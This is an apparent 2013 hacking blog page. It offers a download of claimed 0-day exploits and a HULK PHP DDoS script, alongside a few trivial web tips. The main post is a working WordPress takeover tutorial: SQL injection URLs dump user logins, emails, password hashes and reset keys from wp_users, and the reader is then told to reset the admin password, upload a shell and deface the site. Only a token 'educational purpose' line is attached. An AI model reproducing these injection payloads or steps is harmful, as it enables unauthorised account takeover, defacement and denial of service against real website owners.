This post is not about any hack or trick. Today I am sharing some private 0-day exploits with you.
I have created a rar archive with 10 0-Day exploits. I am providing link to download exploits.
Tuesday, 30 April 2013
[Download]0-Day exploits collection
This post is not about any hack or trick. Today I am sharing some private 0-day exploits with you.
I have created a rar archive with 10 0-Day exploits. I am providing link to download exploits.
Saturday, 27 April 2013
Hacking Wordpress without hash cracking
As we all know now the worpdress blogs are using higher alogrithem to encrypt blog passwords, which are not easy to crack. The only methods to crack these hashes is Brute Force but brute force takes too much time.
Now lets get started--->
Things you need --->
1. Wordpress version <= 3.4.2
2. Sql injection vulnerable wordpress site(make sure version of wp site is 3.4.2 or less than it)
Lets start --->
Find SQLi vulnerable worpdress site.
Like i get www.site.com?fbconnect_action=myhome&fbuserid=1
nw add this code after the wordpress site address
+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--lets start pwning
First go to http://target.com/wp-login.php
Now click on Lost your password ?
Now click on Lost your password ?
Now the wordpress will ask you for the username or email, enter the username or email id which you got on the field and click get password.
Now it will be saying "Check your e-mail for the confirmation link."
now what wordpress does is it sends an activation key to the email address also it sets the value of activation key in the database as well.
we will be getting the user activation key by sqli this is what its all about.
Add column name user_activation_key to extract
http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa%E2%80%8Btion_key),7,8,9,10,11,12+from+wp_users--
Now you will be able to see the activation key
Now .. finally all we have to do is enter the following url to end of the site and edit it with your activation key and username
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE
http://target.com/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=admin
Now the wordpress will ask u for ur new password enter your desired password & click change.
Now upload shell and then deface it.
Note -->
1. Only for educational purpose.
2. This hack only works on Worpdress versions 3.4.2 or less than it..
Wednesday, 24 April 2013
HOW TO FIND WHO UNFRIEND YOU IN FACEBOOK
HEY GUYZ NOW IM GONNA SHARE HOW TO FIND WHO UNFRIEND YOU IN FACEBOOK.
FOLLOW THE STEPS BELOW :
1) FIRST ENTER THE WEBSITE -----> OUT AND IN
2) TICK THE BOX (TO USE THIS SERVISE YOU HAVE TO ACCEPT THE TERMS OF USE)
3) THEN CLICK LOGIN WITH FACEBOOK
4)NOW WAIT UNTIL IT FINISH LOADING THEN IT WILL SHOW SOME LIST OF FRIEND.
THOSE ARE THE FRIENDS WHO UNFRIEND YOU IN FACEBOOK
THANKS FOR VISIT OUR BLOG......
GIVE US YOUR CONTINUOS SUPPORT
Wednesday, 10 April 2013
DOWNLOAD HULK PHP DDOSER SCRIPT
HULK DDOSER PHP SCRIPT IS USED TO DOS A WEBSITE ON A SLOW SPEEED
CODED BY --> MANISH TANWAR FROM TEAM INDISHELL
DOWNLOAD MEDIAFIRE
CODED BY --> MANISH TANWAR FROM TEAM INDISHELL
DOWNLOAD MEDIAFIRE
Tuesday, 9 April 2013
WATCH 18+ YOUTUBE VIDEO WITHOUT SIGNING IN
THIS IS MY FIRST ARTICLE AFTER EDITING TEMPLATE NOW THE BLOG IS BEEN UPGRADED.WITH FAST LOADING TIME.. PLEASE SHARE THIS BLOG TO YOUR FRIENDS
NOW LETS START:
1) SEE THIS WEBSITE WITH DETAILED EXPLANATION ------>HERE
2) NOW GO TO YOUTUBE AND COPY THE VIDEO URL
EXAMPLE :
http://www.youtube.com/watch?v=SQ71AVFVFdU
3)NOW COPY THE VIDEO ID. IN THIS CASE THE VIDEO ID IS SQ71AVFVFdU
4) NOW REPLACE THE VIDEO ID WITH THE WORD VideoId:
http://www.youtube.com/v/VideoId?fs=1
5) THEN COPY THE NEW URL AND PASTE IN ADRRESS BAR AND CLICK ENTER
THATS ALLL
THANK YOU
Thursday, 4 April 2013
HOW TO FIND THE WEBSITE IS DOWN OR NOT
HEY EVERY ONE HOW ARE YOU NOW DAVIDREX IS GOING TO TEACH YOU HOW TO FIND A WEBSITE IS DOWN OR NOT ...
JUST TWO STEPS ONLY:
1) GO TO THIS WEBSITE DOWN OR NOT
2) THEN ENTER THE WEBSITE LINK AND CLICK ENTER!!!!!!!
ITS ONLY FOR NOW...
DONATE FOR US .. CLICK THE LINK BELOW PLEASE
FREE DONATION
Subscribe to:
Posts (Atom)